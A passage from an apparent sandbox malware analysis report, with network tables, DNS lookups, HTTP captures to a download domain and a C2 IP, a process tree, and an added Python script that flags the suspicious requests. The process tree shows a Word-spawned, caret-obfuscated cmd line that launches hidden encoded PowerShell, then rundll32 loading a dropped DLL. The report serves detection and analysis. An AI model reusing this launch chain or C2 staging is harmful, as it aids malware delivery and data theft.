                                             Jan 25, 2021 23:13:53.864537954 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:53.864541054 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.072763920 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.102535963 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.102585077 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.102616072 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.102644920 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.102684021 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.102713108 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.102751017 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.102777004 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.102816105 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.102844954 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.102893114 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.102904081 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.102926016 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.102937937 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.102942944 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.102946997 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.103010893 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.107592106 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.107825994 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.113141060 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113176107 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113213062 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113250017 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113285065 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.113295078 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113317013 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.113322020 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113359928 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113390923 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.113430977 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113461018 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113497972 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113535881 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113544941 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.113563061 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.113574028 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113621950 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113655090 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113656998 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.113692999 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113732100 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113734961 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.113770008 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113806009 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113810062 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.113848925 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113879919 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.113888025 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113928080 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.113960981 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.113970041 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.114007950 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.114037037 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.114047050 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.114075899 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:54.114140987 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.115009069 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:54.344427109 CET  443       49166     104.21.88.166   192.168.2.22

                                            UDP Packets

                                             Timestamp                            Src Port  Dst Port  Source IP      Dest IP
                                             Jan 25, 2021 23:13:52.213778973 CET  52197     53        192.168.2.22   8.8.8.8
                                             Jan 25, 2021 23:13:52.261915922 CET  53        52197     8.8.8.8        192.168.2.22
                                             Jan 25, 2021 23:13:52.616822958 CET  53099     53        192.168.2.22   8.8.8.8
                                             Jan 25, 2021 23:13:52.665087938 CET  53        53099     8.8.8.8        192.168.2.22

                                            DNS Queries

                                             Timestamp                            Source IP      Dest IP  Trans ID  OP Code             Name                  Type            Class
                                             Jan 25, 2021 23:13:52.213778973 CET  192.168.2.22   8.8.8.8  0xd372    Standard query (0)  nightlifemumbai.club  A (IP address)  IN (0x0001)
                                             Jan 25, 2021 23:13:52.616822958 CET  192.168.2.22   8.8.8.8  0x7032    Standard query (0)  shop.nowfal.dev       A (IP address)  IN (0x0001)

                                            DNS Answers

                                             Timestamp                            Source IP  Dest IP        Trans ID  Reply Code    Name                  CName  Address         Type            Class
                                             Jan 25, 2021 23:13:52.261915922 CET  8.8.8.8    192.168.2.22   0xd372    No error (0)  nightlifemumbai.club  -      172.217.6.174   A (IP address)  IN (0x0001)
                                             Jan 25, 2021 23:13:52.665087938 CET  8.8.8.8    192.168.2.22   0x7032    No error (0)  shop.nowfal.dev       -      104.21.88.166   A (IP address)  IN (0x0001)
                                             Jan 25, 2021 23:13:52.665087938 CET  8.8.8.8    192.168.2.22   0x7032    No error (0)  shop.nowfal.dev       -      172.67.151.106  A (IP address)  IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • nightlifemumbai.club
                                            • 190.55.186.229

                                            HTTP Packets

                                             Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
                                             0           192.168.2.22   49165        172.217.6.174   80                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                             Timestamp                            kBytes transferred  Direction  Data
                                             Jan 25, 2021 23:13:52.437289953 CET  0                   OUT        GET /x/0wBD3/ HTTP/1.1
                                            Host: nightlifemumbai.club
                                            Connection: Keep-Alive
                                             Jan 25, 2021 23:13:52.591087103 CET  1                   IN         HTTP/1.1 404 Not Found
                                            Content-Type: text/html; charset=UTF-8
                                            Referrer-Policy: no-referrer
                                            Content-Length: 1569
                                            Date: Mon, 25 Jan 2021 22:13:52 GMT
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 
64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                            Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand


                                             Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
                                             1           192.168.2.22   49167        190.55.186.229  80                C:\Windows\SysWOW64\rundll32.exe
                                             Timestamp                            kBytes transferred  Direction  Data
                                             Jan 25, 2021 23:14:06.472196102 CET  666                 OUT        POST /efl8dd1i/ HTTP/1.1
                                            DNT: 0
                                            Referer: 190.55.186.229/efl8dd1i/
                                            Content-Type: multipart/form-data; boundary=------------diOigcaeBsfw
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 190.55.186.229
                                            Content-Length: 6388
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                             Jan 25, 2021 23:14:08.237360954 CET  674                 IN         HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Mon, 25 Jan 2021 22:14:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Vary: Accept-Encoding
                                            Data Raw: 37 38 34 0d 0a 6a 4c b3 01 fb f5 a4 a4 e0 2f 81 26 86 2b 3f c8 3d dc 11 47 54 75 bd 63 8a 27 d3 3a e9 e4 31 f0 40 bd 80 08 9d 25 38 97 21 09 a7 39 31 99 e5 67 01 a6 31 0e 94 7d eb 8f a1 33 7f c5 19 1b c8 56 c4 80 33 b9 71 2c 27 0c b0 ed 99 18 c6 75 0e 73 b5 b9 80 87 2c ba 0f ec 3c 9d 77 3c b4 02 8d c1 cf 2b d5 8a 7d 1b 8e 31 cb be da f7 90 ce c8 80 51 e9 be d1 83 68 f2 50 73 ea 23 c1 98 34 3e 62 c3 03 45 4c 87 fa a5 ab 6c 1f 1a 56 0b cd 7d 10 fd cf 50 01 72 81 c5 79 75 44 8a c2 cb a1 d2 2a ce a6 12 72 d1 fb 83 82 98 16 ea 42 5b 62 28 83 a4 38 30 29 66 ee f5 61 db da 48 8c 76 b7 b2 93 55 4c b6 5e 3d 91 de fa 97 a4 97 e4 27 aa a3 ba af 16 76 14 3a c5 f4 33 8e 3e 43 1d 03 32 76 92 c4 8d 94 8c e5 ef e0 ca b7 7e 49 53 12 f7 7f 99 c5 d1 51 13 97 b4 43 aa a2 bf 24 84 65 ff f5 78 78 f7 1d 5a dd 4a c4 f3 97 fe 6c b0 ab 04 db e0 3c 0c b6 c0 3f c7 ad 95 84 62 2b 4e 57 ca d2 a3 fd f7 82 3b 79 fc 7b f0 35 9a 5b 23 46 e7 20 e3 c1 33 73 1e 01 90 70 98 05 d6 f6 3b f5 61 86 48 c0 cf 60 80 22 28 cf 51 32 1f e9 c5 9a 34 98 42 f1 78 41 c6 93 e8 40 4e 2b 9f 55 67 9b 74 62 fe 84 b8 d5 1a 26 d7 ba f4 69 f9 c8 eb 53 a1 d5 1d c0 3c fa 50 42 bc f0 79 1a fc dc f5 c5 21 bb 32 25 41 64 63 25 5e a0 88 35 24 26 0e 2e 54 32 92 b0 f5 02 90 d9 37 1b e3 5d 5f 91 95 c4 d6 2f 7e 88 4e eb 7b 19 ae 60 4a 9b 24 33 d2 6a 71 6d 49 09 c1 df fa 32 7d 69 05 44 d7 95 3b 17 a9 aa 74 31 dd 65 5b 79 29 49 bb 51 41 3d 54 65 91 75 77 8a 82 3a 58 45 56 8c 97 b9 7d de d9 e9 b1 18 78 44 20 47 4f 4f d5 54 aa 43 c7 65 a6 73 5a 51 ff 99 56 3b 1f d8 77 ce 75 ed 52 ea c7 ab c6 07 c6 08 9e 27 66 3e ec 5a fc a0 4d 37 f2 e2 c9 ac 94 0d 23 33 73 60 4f 0e 68 df dc 3a 84 2f b0 bc be d4 0f b7 f6 fb c7 79 89 9a 67 e3 be 80 ff 7c 96 6f dc 51 be 7e 05 20 d5 fc 2a 33 90 55 0c 7f 51 93 64 cd b6 07 0c 0c 31 2d 62 38 74 3c 3b a2 0c ee 92 61 05 b3 11 dc 05 08 d8 04 41 2a 09 5a fe c5 37 00 49 3c 35 21 0d 82 fd 4d 0c d3 6c e1 97 44 0e a6 01 fb 52 44 4e bb 0d db 9d 07 7b d6 b7 58 e0 50 
7f 27 0d 4e fa e2 d5 6b 1e 47 5a a8 45 2e 8d f4 f9 81 1f 5b 91 32 c5 27 eb 79 d3 67 c1 b6 ce c5 9e 03 d4 3b 68 18 69 51 24 5d bb cd 50 07 1f 1e f2 c2 a2 7e 70 e9 f3 20 7f d4 3f dc 91 b8 77 4a f1 17 e5 07 49 1a 1f d9 36 2d 53 2a 5b 35 42 34 e5 bb d4 f1 a2 89 15 fe bb 93 32 d4 88 1e 46 24 76 83 b9 24 52 4c 71 71 b5 81 05 ca 56 42 dd af 32 e3 b3 b2 76 1d c2 3d 71 64 8b c6 7b 63 86 69 ce 47 bd f9 d3 30 71 8c a1 07 1f d3 97 8c 02 5c 40 b9 71 fb 17 b3 48 d0 2a cb 45 84 21 0a db 31 99 11 ec 82 6a bd 6d 00 b6 f9 53 38 45 a2 44 dc 06 ee 1f 9f b5 b1 a2 2e 63 72 7e 1d 9a 4c 55 7b 9a f9 eb ab bd 08 2e 3d d6 75 be 4d 83 65 8a b0 23 e0 7f a0 e5 3f 60 38 b1 10 75 bc 93 6e d3 43 53 32 64 f0 ce c3 5e 60 04 dd 47 fa d3 02 60 a3 db 2e cf b6 29 04 84 d4 71 c3 1b 45 93 a8 4d 85 d0 82 ef 5c 17 8e 87 df 90 3e 9e 73 b5 ed 65 3c 68 b0 ef ea c7 09 6e da ba 0e cc 52 be d1 18 d0 ff 20 96 76 e7 ce 15 3c 70 7f 70 e3 c4 ec 2a 7f 01 73 eb 67 1b 0f cd 08 c2 f2 31 bf 64 8e 17 d5 4f 3b 5c 64 6b cb 1b c1 2c 21 68 0e 60 2f db bf a8 9f 5c d2 36 64 2a 95 2e f5 c9 3d 80 71 52 d9 09 9a ba a8 90 32 52 40 58 8d 12 c7 2a b0 7d 1e 39 f0 f2 fc cc f0 7e 3e 2e 1c 97 9b 0e 95 de 86 ad 21 ac 3f 17 9b 05 65 f3 e2 4e cb f4 e8 d9 2e 85 6e 12 e6 c0 94 89 7a ab 0f f3 69 11 66 d3 70 eb fb e5 20 b6 3a b3 2f 3a ee e6 bf 3d e5 c6 6f 2d 67 0c 35 91 d2 58 ec 5d 22 d7 45 86 6a 47 5c f5 e4 b5 d4 1e 63 5e 9e 88 64 7d 5a f8 fe fd 27 17 b8 fe a0 d9 f9 4c bb f2 e9 fe b4 34 d3 3a 46 21 eb dd a6 44 e4 45 8b f5 a9 72 45 d6 01 00 6f 54 0d ac b5 36 05 78 d6
                                            Data Ascii: 784jL/&+?=GTuc':1@%8!91g1}3V3q,'us,<w<+}1QhPs#4>bELlV}PryuD*rB[b(80)faHvUL^='v:3>C2v~ISQC$exxZJl<?b+NW;y{5[#F 3sp;aH`"(Q24BxA@N+Ugtb&iS<PBy!2%Adc%^5$&.T27]_/~N{`J$3jqmI2}iD;t1e[y)IQA=Teuw:XEV}xD GOOTCesZQV;wuR'f>ZM7#3s`Oh:/yg|oQ~ *3UQd1-b8t<;aA*Z7I<5!MlDRDN{XP'NkGZE.[2'yg;hiQ$]P~p ?wJI6-S*[5B42F$v$RLqqVB2v=qd{ciG0q\@qH*E!1jmS8ED.cr~LU{.=uMe#?`8unCS2d^`G`.)qEM\>se<hnR v<pp*sg1dO;\dk,!h`/\6d*.=qR2R@X*}9~>.!?eN.nzifp :/:=o-g5X]"EjG\c^d}Z'L4:F!DErEoT6x
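The two requests above are the only packet-level record of this sample's HTTP activity in this section: the TCP packet table stops at 23:13:54 and never lists the 49167 to 190.55.186.229:80 flow that the Snort alert fires on. Read side by side they show what an analyst should key on. powershell.exe fetches /x/0wBD3/ from nightlifemumbai.club with no User-Agent header at all and gets back Google's generic 404 page (the Data Ascii above is that page, so this download URL was already dead at analysis time); the HTTPS session to shop.nowfal.dev is the only other outbound transfer in that phase, and its content is not visible in the report. Then rundll32.exe POSTs multipart/form-data to a bare IP over plain HTTP with a Referer that has no scheme and simply repeats Host plus path. The Python below, an added example and not part of the Joe Sandbox report, encodes those observations as header-level checks and runs them over the two requests transcribed from the tables above. The list of script-host binaries and the finding labels are the example's own choices.

```python
import ipaddress
import re

# The two HTTP requests captured above, transcribed from the report's HTTP
# Packets tables (request line and headers only; bodies omitted).
SESSIONS = [
    {
        "id": 0,
        "process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "dst_port": 80,
        "request": "GET /x/0wBD3/ HTTP/1.1\r\n"
                   "Host: nightlifemumbai.club\r\n"
                   "Connection: Keep-Alive\r\n\r\n",
    },
    {
        "id": 1,
        "process": r"C:\Windows\SysWOW64\rundll32.exe",
        "dst_port": 80,
        "request": "POST /efl8dd1i/ HTTP/1.1\r\n"
                   "DNT: 0\r\n"
                   "Referer: 190.55.186.229/efl8dd1i/\r\n"
                   "Content-Type: multipart/form-data; boundary=------------diOigcaeBsfw\r\n"
                   "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; "
                   "Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; "
                   ".NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\r\n"
                   "Host: 190.55.186.229\r\n"
                   "Content-Length: 6388\r\n"
                   "Connection: Keep-Alive\r\n"
                   "Cache-Control: no-cache\r\n\r\n",
    },
]

# Binaries that should never be the HTTP client on a workstation.  This list is
# the example's own policy, not something the report defines.
SCRIPT_HOSTS = {"powershell.exe", "rundll32.exe", "regsvr32.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, {lower-case name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_ip_literal(host):
    """True when the Host header is a bare IPv4 address (optional :port)."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def score_session(session):
    """Return the ordered list of heuristic findings for one captured session."""
    method, path, h = parse_request(session["request"])
    findings = []
    exe = session["process"].rsplit("\\", 1)[-1].lower()
    if exe in SCRIPT_HOSTS:
        findings.append("client-is-" + exe)
    if "user-agent" not in h:                       # the report's own signature
        findings.append("no-user-agent")
    host = h.get("host", "")
    if is_ip_literal(host):
        findings.append("host-is-ip-literal")
    ref = h.get("referer")
    if ref is not None and not re.match(r"[a-z][a-z0-9+.-]*://", ref, re.I):
        findings.append("referer-without-scheme")
        if ref == host + path:                      # Referer merely echoes Host + path
            findings.append("referer-echoes-request")
    if (method == "POST"
            and h.get("content-type", "").startswith("multipart/form-data")
            and is_ip_literal(host) and session["dst_port"] == 80):
        findings.append("multipart-post-to-ip-over-http")
    return findings


def main():
    for s in SESSIONS:
        print(s["id"], s["process"].rsplit("\\", 1)[-1], score_session(s))


if __name__ == "__main__":
    main()
```

The no-user-agent check is the same condition behind the report's "HTTP GET or POST without a user agent" signature; the scheme-less Referer that echoes the request and the multipart POST to an IP literal on port 80 are what make the 190.55.186.229 exchange stand out even without the Feodo Tracker rule. Proxy and web-gateway logs normally carry method, Host, Referer, Content-Type, User-Agent and the originating process, so the same checks port directly to a log query.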


                                            HTTPS Packets

                                             Timestamp                            Source IP       Source Port  Dest IP        Dest Port
                                             Jan 25, 2021 23:13:52.760840893 CET  104.21.88.166   443          192.168.2.22   49166
                                             Certificate chain presented by the server:
                                               Subject:    CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US
                                               Issuer:     CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
                                               Not Before: Sat Aug 01 02:00:00 CEST 2020
                                               Not After:  Sun Aug 01 14:00:00 CEST 2021
                                               Subject:    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
                                               Issuer:     CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
                                               Not Before: Mon Jan 27 13:48:08 CET 2020
                                               Not After:  Wed Jan 01 00:59:59 CET 2025
                                             JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
                                             JA3 SSL Client Digest:      05af1f5ca1b87cc9cc9b25185115607d

                                            Code Manipulations

                                            Statistics

                                            Behavior


                                            System Behavior

                                            General

                                            Start time:23:13:33
                                            Start date:25/01/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                            Imagebase:0x13f7a0000
                                            File size:1424032 bytes
                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:23:13:35
                                            Start date:25/01/2021
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [base64-encoded PowerShell command omitted]
                                            Imagebase:0x4a950000
                                            File size:345088 bytes
                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:23:13:36
                                            Start date:25/01/2021
                                            Path:C:\Windows\System32\msg.exe
                                            Wow64 process (32bit):false
                                            Commandline:msg user /v Word experienced an error trying to open the file.
                                            Imagebase:0xff690000
                                            File size:26112 bytes
                                            MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:23:13:36
                                            Start date:25/01/2021
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell -w hidden -enc [base64-encoded PowerShell command omitted]
                                            Imagebase:0x13f100000
                                            File size:473600 bytes
                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high

                                            General

                                            Start time:23:13:42
                                            Start date:25/01/2021
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                                            Imagebase:0xffa70000
                                            File size:45568 bytes
                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
